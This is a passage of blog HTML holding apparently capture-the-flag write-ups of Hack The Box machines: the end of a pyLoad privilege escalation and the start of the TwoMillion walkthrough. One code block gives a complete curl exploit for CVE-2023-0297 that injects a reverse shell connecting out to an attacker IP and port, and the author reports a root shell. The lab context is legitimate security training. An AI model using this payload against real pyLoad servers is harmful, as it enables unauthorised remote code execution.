url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/UlEQVR42l2PWXKDMBBEuUqcAAaxYwECsa+u2LhMfP+rdEb6SJXz8UpTo5nuHiPpd4j5CdntKLs7cUNRb6inB+T4QLs80cwHRPuNMBvgpR2+WIFPN/9HpjH66cC4/mDYXuiWA/36ghx2tGSSlguJjIiLGaYn/pZPTvaGEjo5XGNE2YSQD3DDGn7SES1svyJKjUpjegUsqk1faGFT1fSq3jmU2sSmP4vmjJiPSPMJLGpwJiGLCSRiQSavCHiPS7XqhAmRqn59BZebTu/GDaJ8JNMcLKH9sILB5IqgXFE1NzBK6QSSqHRK5cxoSacNCErjxjQT1TqZOvfD5m8n/wKlY6IDoI29ngAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="wget linpeas" title="" src="/static/a4b4a1ad08879e4230dfc8e66a8327f2/50637/download-linpeas.png" srcset="/static/a4b4a1ad08879e4230dfc8e66a8327f2/dda05/download-linpeas.png 158w, /static/a4b4a1ad08879e4230dfc8e66a8327f2/679a3/download-linpeas.png 315w, /static/a4b4a1ad08879e4230dfc8e66a8327f2/50637/download-linpeas.png 630w, /static/a4b4a1ad08879e4230dfc8e66a8327f2/d5403/download-linpeas.png 739w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After enumerating with LinPEAS, the most interesting results were the active ports:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/42be465e2294984f9cea67be137d9347/6f406/linpeas-active-ports.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABW0lEQVR42lWQ2XLCMAxF+yvYcuwsjh1nD1CgQIelpW/9/z+5lUNphwdNlpGOju4L+TPIX0HNF5LxgmR1g+pPEOkAYTeQdgtZ7rgezw1EvuRazd8U/xdryKyf66VoP0DuDNPeQPUZrruiK/ewbgcVjqDqBAoneHdE7Q/Q9QXCHyEcv7efqLffUP4N9ABa/wrSLdJ8gjA9qmzAID1qO8IFNkk8pK5QU4lWB+iiZ/uWexuYckQzHaCKAZQPv8BqCzIDjF1z4wRvl+gpoAtbZH6DhQqQSUAQFg05KBN4SXUHujWa5YmB4//JEajYzBScSTrCFhMq3cFG63I9Zym5nGlRph0UD0XgQnloOyCM78+Gvtkj4TMjkBiYc+Bl4EzsCgsGR5jkhRkPCO4T6d1EsLW28eTjs2HGFoqHknxkIIOzESWfmnIEUnOTuQMNwyiLtv28RLBxtC3qzZ9dBP4AnNDZ2KtesUsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="linpeas active ports" title="" src="/static/42be465e2294984f9cea67be137d9347/50637/linpeas-active-ports.png" srcset="/static/42be465e2294984f9cea67be137d9347/dda05/linpeas-active-ports.png 158w, /static/42be465e2294984f9cea67be137d9347/679a3/linpeas-active-ports.png 315w, /static/42be465e2294984f9cea67be137d9347/50637/linpeas-active-ports.png 630w, /static/42be465e2294984f9cea67be137d9347/6f406/linpeas-active-ports.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I forwarded port 1234 on my machine to port 8000 on the target machine to see what was running:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 477px; " > <a class="gatsby-resp-image-link" href="/static/3c55d2622b2ed3e2e6a003fab39aef94/2dd4c/port-forward.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.151898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9ElEQVR42jWP2XKCQBBF/ZbINmMUozDAuCGguBBMLIwPyUMq//8PJy1VPnR131t1lx544QLXNDjmhpPcUfaOjnI2u0+ayw/74432+kv39YfN39Hhqh9/bFGTJa5OcVTCMIgZ+hED9ZYTra9MsyNa7nTVYNdn2SfWRUtefVDWHSarMfZAsjgwjQsm85yZqfDE8MWPcXyDEyQMYltTnDqW25b6dCMvL8QiTuyeTIzt6kyU7hmFGyLhw/m2N5qZklmyE1z0WI+X0tBIw7Ri3FwJopJz+00mzR6JwSjDlVceqZ7O8LUleF3gC69EHIye2Pa3q9K+4T8YAIT0PK1BnAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="port forward" title="" src="/static/3c55d2622b2ed3e2e6a003fab39aef94/2dd4c/port-forward.png" srcset="/static/3c55d2622b2ed3e2e6a003fab39aef94/dda05/port-forward.png 158w, /static/3c55d2622b2ed3e2e6a003fab39aef94/679a3/port-forward.png 315w, /static/3c55d2622b2ed3e2e6a003fab39aef94/2dd4c/port-forward.png 477w" sizes="(max-width: 477px) 100vw, 477px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This brought up a page running pyLoad:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3e333d737fc7dc837f081e9c8bdca293/f3121/pyload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFklEQVR42p2TwWqDQBRF/c5u8g9d9Ae6y6a77oVuukkhqZAukqWbICHBEgJiXaYgtAmazozju3WihkYcnebCxXGYObznu1roUJ7nJxPRea3cJateUPUUQmC6+MB6swZlCdR9taegNVi99wOpRO6+Je4fbrF0bjB9fcboZYz5fAbP8+A4Dmzbhuu65w60wJJaHuC7N7DPGZarbQFaIIoihGGIIAjg+z7iOL4oQg+sJItzOeEqWe3bdHL93f66HpIR0GSK/6qQc440PSLLsouY6GxcYVurba33AhljRYUJpJRaUDNmvRU2/4qmkx+BfcJxSLlZbLomqDScvGPw6OLuyYOsskX9sdFrfxSIDwxfRZVknsPrY/MLzR5IlOARoaAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pyLoad" title="" src="/static/3e333d737fc7dc837f081e9c8bdca293/50637/pyload.png" srcset="/static/3e333d737fc7dc837f081e9c8bdca293/dda05/pyload.png 158w, /static/3e333d737fc7dc837f081e9c8bdca293/679a3/pyload.png 315w, /static/3e333d737fc7dc837f081e9c8bdca293/50637/pyload.png 630w, /static/3e333d737fc7dc837f081e9c8bdca293/f3121/pyload.png 735w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A web search for pyLoad vulnerabilities led me to CVE-2023-0297 mentioned on <a href="https://security.snyk.io/vuln/SNYK-PYTHON-PYLOADNG-3230895" target="_blank">this</a> page from snyk Vulnerability DB which references a PoC found <a href="https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad" target="_blank">here</a>.</p> <p>The current version running on the machine was before the patch:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 258px; " > <a class="gatsby-resp-image-link" href="/static/ae5e11e4f47d1b483e5f3a74b3718898/f7090/pyload-version.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVR42o2Qy07CUBCGeRRCTy+nJ9RwOz2lnELFAi2tpkkRvKBGVya8gGsT9z7x79C6QFYuvszkz8w3ybR4uUX39Q1i/wyuU/T8AvGigo5vkKRb4hZZcQ+vPyPmWGTHbIc5zaTXe/RlgrYpwbiCQbR0UkJdlZgVOwRRDjVZQ45XCPQa4bSAxQO43gQmDVvuGMKLwLsatgjBqTcpM+xGVgujdIMw22BKwiGJZJjjMqnwfvjAxSBGmw1oQf7io2M1NL1Eh6rhnAidooJ4eIH7+ARXryB6SyzzO3x+fdcS5vgnqD8Y5xyFzByhxiLoGrNHdFXSX4Znsn9IucIPaNqj/5SvdwUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pyLoad version" title="" src="/static/ae5e11e4f47d1b483e5f3a74b3718898/f7090/pyload-version.png" srcset="/static/ae5e11e4f47d1b483e5f3a74b3718898/dda05/pyload-version.png 158w, /static/ae5e11e4f47d1b483e5f3a74b3718898/f7090/pyload-version.png 258w" sizes="(max-width: 258px) 100vw, 258px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So, I started a listener with Netcat:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 313px; " > <a class="gatsby-resp-image-link" href="/static/88748004d00ebc12d8f93d63e84e9a4b/87fcf/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVR42h2P3W6CYBBEfZGalH4UxR+KCIiKgloFQQEDktRYL9r3f4XTrRcnc7G7szMd3fQw7A3Ka1BOiXJblJ2jpjXaKOJt4GM5Ecnpi2hbst5eRAvifU1e3tkdGlKZOfM9muHS6fkJRlChh79ieMFY3jHCm+iD2eYqZLiynJcPsvONbXKlqL45CVlxJ81vJMeW6eKA9i6Gpl9geifGwR7TChi6K6xwhzWLSbOWJG0YWqF8lyaD+fPo5dUWPuiKdrWJYKPpDqrn0VmECZvdWaLXUqdiFRfMl0dceeCLrqWeLwnjz5qq+SGQJINxyGgSofoz9L7/5N9M9Xz+ALGYiBmFgSjjAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/88748004d00ebc12d8f93d63e84e9a4b/87fcf/netcat.png" srcset="/static/88748004d00ebc12d8f93d63e84e9a4b/dda05/netcat.png 158w, /static/88748004d00ebc12d8f93d63e84e9a4b/87fcf/netcat.png 313w" sizes="(max-width: 313px) 100vw, 313px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I edited the exploit code featured in the PoC to be a URL encoded reverse shell command within the <code class="language-text">system()</code> function:</p> <div class="gatsby-highlight" data-language="bash"><pre class="language-bash"><code class="language-bash"><span class="token function">curl</span> <span class="token parameter variable">-i</span> <span class="token parameter variable">-s</span> <span class="token parameter variable">-k</span> <span class="token parameter variable">-X</span> <span class="token string">$'POST'</span> <span class="token punctuation">\</span> --data-binary <span class="token string">$'jk=pyimport%20os;os.system(<span class="token entity" title="\&quot;">\"</span>%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.30%2F9001%200%3E%261%27<span class="token entity" title="\&quot;">\"</span>);f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaaa'</span> <span class="token punctuation">\</span> <span class="token string">$'http://127.0.0.1:8000/flash/addcrypted2'</span></code></pre></div> <p>Sent the payload:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3a881a9e022d6e668bddf2e68f94691d/76b06/payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.025316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVR42k3LQQ6CMBRFUTYDAxUIamkpRaDWSAvGOHH/O7kWQ6KDk5ufl5/kyqHGB02/RDPGPnHhTX97IYzn3N4R7YS8+O8tu0DdrfWxE3pc0MMcfwOVtCTH+squNOSngWJTSUchRsq4lcKS5Zp0r0gPq2brT/bnA34VQon3SS46AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="payload" title="" src="/static/3a881a9e022d6e668bddf2e68f94691d/50637/payload.png" srcset="/static/3a881a9e022d6e668bddf2e68f94691d/dda05/payload.png 158w, /static/3a881a9e022d6e668bddf2e68f94691d/679a3/payload.png 315w, /static/3a881a9e022d6e668bddf2e68f94691d/50637/payload.png 630w, /static/3a881a9e022d6e668bddf2e68f94691d/76b06/payload.png 854w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Obtained a root shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9343ad653d664748492d2a435c7d1de0/87b66/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPElEQVR42o2R23KCMBRF+RUEKigKQgwh4eYFFW9j//9jds+JWsfOdNqHNUmGOSt7E2ciesTlFZG6QLafUNVAHJHJHnnRI5gouIHA6GP5jRvwKuGNC4yY8I4XKTg8XHcXKL1D1Z5hGqK9IJdbCBI2mxt0c4I0ByzLPWR5gDJHSD0gmtUIiShhGviTEo4hSVkfbaqKxPXqSmK6wAwkOlPKHeK0QZqvEdNQkq+QijXm2QrTpMU0vRMvOmqj4Ui6Vages0VrK3KyhdjQuUEYl5Sigs+VqKY3lm/VuTbjMvTtUXlAt71RvS10fbKVOZ3Ue9qfkC7XJDZWaomK1z5UFu8JC3mw7s5IKHLEg3RTQPDqh5xA2GQvyU/Um9jR9P8MpYznFTyq4T9lD+GL4g/uUsfwg+gD0qxFSK/0u7T4F1+udP5crwpf7AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/9343ad653d664748492d2a435c7d1de0/50637/root.png" srcset="/static/9343ad653d664748492d2a435c7d1de0/dda05/root.png 158w, /static/9343ad653d664748492d2a435c7d1de0/679a3/root.png 315w, /static/9343ad653d664748492d2a435c7d1de0/50637/root.png 630w, /static/9343ad653d664748492d2a435c7d1de0/87b66/root.png 662w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-twomillion/https://mgarrity.com/hack-the-box-twomillion/Tue, 13 Jun 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/00729c10cca683f1c4f86f81bedb6fcb/3b67f/twomillion.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8UlEQVR42mMQkdX+jxPLaf8Xltb6LyiB4ONVD8QMuCREgZoFJbT+C8tq/ZfW0vwvJKMJ5hMylAGnYZJa/1VM9P/HVtj+b58V/j+v3eu/kqEOUBwiT7ILRWS0/qd0u//vXpH0f/Gqgv8Ld+T+j2m1A4qT6kKw67T/y2tr/8+fGfA/rMPrf/mCiP/VixP/J/d7AsV1/gtJ4XYlThcKy2r+j2t0+9+wtPh/THPY//qlJf9T2ryAlqkDLdUhPQwFgBGgBgzDoFKr/z4V5v/DKuz+qxobgMXJCkOYoaCwVNLT+y8MpAkZhj9SoIaCMCzMRIlIhwDVYwjOhAoL+gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="twomillion" title="" src="/static/00729c10cca683f1c4f86f81bedb6fcb/50637/twomillion.png" srcset="/static/00729c10cca683f1c4f86f81bedb6fcb/dda05/twomillion.png 158w, /static/00729c10cca683f1c4f86f81bedb6fcb/679a3/twomillion.png 315w, /static/00729c10cca683f1c4f86f81bedb6fcb/50637/twomillion.png 630w, /static/00729c10cca683f1c4f86f81bedb6fcb/fddb0/twomillion.png 945w, /static/00729c10cca683f1c4f86f81bedb6fcb/3b67f/twomillion.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>TwoMillion is a Linux machine hosting a web application with an API that has a command injection vulnerability. This vulnerability can be exploited to obtain a shell on the system as <code class="language-text">www-data</code>. Enumeration can lead to the discovery of a configuration file that contains credentials for the <code class="language-text">admin</code> user, allowing for SSH login. An email in the <code class="language-text">/var/mail</code> directory provides a hint indicating that the Linux kernel version on the machine is outdated and might be vulnerable to certain CVEs; this leads to the identification of CVE-2023-0386, a local privilege escalation vulnerability that can be exploited to gain <code class="language-text">root</code> access on the system.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/680788f0d08843de4e66d2aa1abaa492/e1355/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABt0lEQVR42nWS63KbMBSEeRUb21wNRlyEBBK2MRc7TuIknfb9n2R7JDqd6dT5sSMGoY89u3J8/gGPf2GXD6i6O/T4hf76CwlrsYtKbMISW6Mgx47k7QU2UQ035E/liO6B5vQOrl7A5ITm/IDQN9KMSt2Q1YNd4/yIOGsRpwbIvweWYgJvXyzUqD09wKozgkQgKXuk5Rm7vcTKL0kVVjuGlcewDqrnwLZ7Q9d/Lg75CHX5RK2uSGnkXA7WIRODdXjgl8UpaV8ckRQnhJn6JwKn6V7RTz+tM0FwZUamd5KgXPYoRU8/mOD6OdZeji0d3sZi0ZMsHXV8g1B3SP2KWt9xGn8g44ONoZQzivqCqplo7RHsOVabxILd70bmDTlpbuRkxqEcEKSa8tOI2HHRoUN40IjZMqpLWbqUoXHshv9DnShVdkwDjFM6nBigIhf0gU8jBYs2YW2LWZtiyOGiYimK3No9A8wKyqi9oaK2K3lF3dCo9UxNUxnVaGUiyGk/Zh1N0MJPGpJAkGkqRdtiIqZtrk5ZT8joerCKspKzXXM+WmBBkMI8G6C5j81sm/XoGvmJ/AuMjP4AfwPF8kM/AX0rewAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/680788f0d08843de4e66d2aa1abaa492/50637/nmap-scan.png" srcset="/static/680788f0d08843de4e66d2aa1abaa492/dda05/nmap-scan.png 158w, /static/680788f0d08843de4e66d2aa1abaa492/679a3/nmap-scan.png 315w, /static/680788f0d08843de4e66d2aa1abaa492/50637/nmap-scan.png 630w, /static/680788f0d08843de4e66d2aa1abaa492/e1355/nmap-scan.png 763w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>80 (HTTP)</li> </ul> <p>Browsing to the IP redirected to <code class="language-text">2million.htb</code>, so I added that to <code class="language-text">/etc/hosts</code> and then visited the webpage which was an older version of the Hack The Box home page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/69c37e47950da9ffc66d1f7b39e6c24d/94f3c/home-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 83.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACH0lEQVR42oWUa3OaQBSGAY3YJK2XjlVQ7iBeowaF4DSdJLU1n/qt0///S96eswiSNiozz+zZw9l33z3LICVPP5A87/C43+Pp9RfSlz1Ejnh4/inmKY+HePvySvlD7vuOcjuR51peI1neEIwzDIkRLD+blzEcwh6Kd3YQwmL8ELaf5cprJHpwDlmWcN2QcNPI4kv1kiTLYOQDipJRvZL5Jeo3Cnp2FZpThfpBETlZOdbn5DqFQ0UhKsedeM6OePzYlnHbkkX8r/t3XJ62z05VVUVNraFer6NWUzM35499qYeycJK342IPK5UKzqGciE8hDSwXZfrm/2gDm0bnUOMdcN9FMukbK2O5R0wngOOPEMVbzBYR3GAscky5LqvNkIoCz6cXHHuwyJVBu3EhC4aTO0zmKwSjmZjnwke3XrGREDTsAF1DR6czQONTD8rtZ1xdN6FrNjTdwpeegftNKojiFEn6iMVqg/FsgSltNJ4txUaFIFtttQ3qVR/OnYnfjS5izaEPekhiGrS+gyjZIk6/YhnFWK0T4kGIR7TJMkpge2FZMECbBPXBAO7CwJ9mB5seOTMCNFtdErWwJsE19fKehFiQhdnlfLkWvBWkXnU6Ji3WoevUk+kKujuGbY+wib/B9acYjueCcDIvYj+cin4y+SUWgnxs/qtw7Lr0N6HYDSaYzFZwaCxfQBnD9gveHJlvOCfPmY6PPt02j5ZTzp/mLzGht37kQA5+AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="home page" title="" src="/static/69c37e47950da9ffc66d1f7b39e6c24d/50637/home-page.png" srcset="/static/69c37e47950da9ffc66d1f7b39e6c24d/dda05/home-page.png 158w, /static/69c37e47950da9ffc66d1f7b39e6c24d/679a3/home-page.png 315w, /static/69c37e47950da9ffc66d1f7b39e6c24d/50637/home-page.png 630w, /static/69c37e47950da9ffc66d1f7b39e6c24d/fddb0/home-page.png 945w, /static/69c37e47950da9ffc66d1f7b39e6c24d/94f3c/home-page.png 1116w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was an invite code form which needs to be hacked in order to obtain a code:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 610px; " > <a class="gatsby-resp-image-link" href="/static/2bf20564fa18861100ef6d14487a5ff0/574c5/invite-code-form.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVElEQVR42oWT65KCMAyFfZB17b2FgshNUHYWd0Z9/zc6m5bF8YKzP75JSZvTpAmrT64R2IjJrpnGxyYgseYCTE7+F+j8ZmFvdROUk5hMNEwu4LcFtmVDwoL8KnIfGM7PSbwVDJklhUQ9MvhdjqLcQ5oU2noomxEeQrs/oddLoiBXGpzE5tI4BaiEgqQFU5a+UyKJCEuYJJ5hauJFMNx2ez9itx8wnK44jmcU7RHproWnTG9Uk82qDjYv35c8U7QDDj9X9OMFXeS8SH+6ROHnsp8EDbK6Rj0MKA8drUNG3QPZbOseLq/+y9Agbyrsv3s0Xy0FVVRWDbe9p4k2KRrYbKHk51li0sWHNz4lPHRKJNRll9E6jQ2T1HFB3Q9nF5ty7whvwqjDwjjKzlIWhoRc7KzQ5LcKXIXRMctjM0/9wwYLnVcxmOlwgYpzN81emAa1/PdwjV9rLD8ZfQZU7QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="invite code form" title="" src="/static/2bf20564fa18861100ef6d14487a5ff0/574c5/invite-code-form.png" srcset="/static/2bf20564fa18861100ef6d14487a5ff0/dda05/invite-code-form.png 158w, /static/2bf20564fa18861100ef6d14487a5ff0/679a3/invite-code-form.png 315w, /static/2bf20564fa18861100ef6d14487a5ff0/574c5/invite-code-form.png 610w" sizes="(max-width: 610px) 100vw, 610px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After inspecting the code, I found an interesting script: <code class="language-text">/js/inviteapi.min.js</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6bf5f15cd1b758004cc2be0249d09fe7/d60d7/inspect-inviteapi.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiklEQVR42o2S61LbMBCF/Rwpia27JUu+xWASh4QhoSnv/0CHlWxoodDpj2/OaiXvWa2cbZjCd+ScEBQvymQ57/2R//xN9q+CbzAlYVsG65tUtBCGzDTWhaB9+W4cyWJi5u/uYgfrQoLrEt04omoG6KqF8R1M1KojM5vOMaUTWR7dpKPqmopIcldJ34xiF1w5bHcnbPcn9PcPC0f0uyOUDfixYQsFMkMJWdYoYmc5Q8448qgJ/oGCijMyiVowkXKcuru5ybFarbGJBUM9YGh3aOtbWBOglYfRZCItBM1LEuIrxALFiq4945Dp0qEfBjShh6NOja6g4kFyFnT171FfnslMe0Jz+Ak/nhFuL2jGC1z/iJgX/gBeTf+Pn6igHzGdXjAerrh/uGJ//JX0bnrGsH+m132iBzgv8XlZX+iR5vXddH0/U9Y7urK2GIYRXduhqTsE+tfq0MJZn/DOo3IxruCrkGJLY4oa18HXc+wCjauMM6yhaG6MXpnTz/ob82n9cY+RMqZnXeDC4BXN00MagaZEwwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="inpect inviteapi" title="" src="/static/6bf5f15cd1b758004cc2be0249d09fe7/50637/inspect-inviteapi.png" srcset="/static/6bf5f15cd1b758004cc2be0249d09fe7/dda05/inspect-inviteapi.png 158w, /static/6bf5f15cd1b758004cc2be0249d09fe7/679a3/inspect-inviteapi.png 315w, /static/6bf5f15cd1b758004cc2be0249d09fe7/50637/inspect-inviteapi.png 630w, /static/6bf5f15cd1b758004cc2be0249d09fe7/fddb0/inspect-inviteapi.png 945w, /static/6bf5f15cd1b758004cc2be0249d09fe7/d60d7/inspect-inviteapi.png 1074w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The page contained obfuscated javascript code:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/88dbf1dc9b36c3f0465831cf70c73e8c/6cdf4/url-inviteapi-min-js.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.18987341772152%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAoUlEQVR42i3MXQ6CMBAEYA6iEGhrpBjtf6kFJJLw4P3vMy7Vhy8zm91sFccVy/pBzhumtCLNO6Zlx4sE2lmXYWyG9TOMm2CpD/cIZTKcX+AjCRue4U19RqX1CGMSDKUljh44mxD9BK0irBnL7H0uN0fXmh4+wi/VIUBRl1Kj6toenEkILsFKDsVF3EqyrkfXXov6zHEmdSH+OJpaoDl2J4Yv9eBdl9eOhbAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="url inviteapi.min.js" title="" src="/static/88dbf1dc9b36c3f0465831cf70c73e8c/50637/url-inviteapi-min-js.png" srcset="/static/88dbf1dc9b36c3f0465831cf70c73e8c/dda05/url-inviteapi-min-js.png 158w, 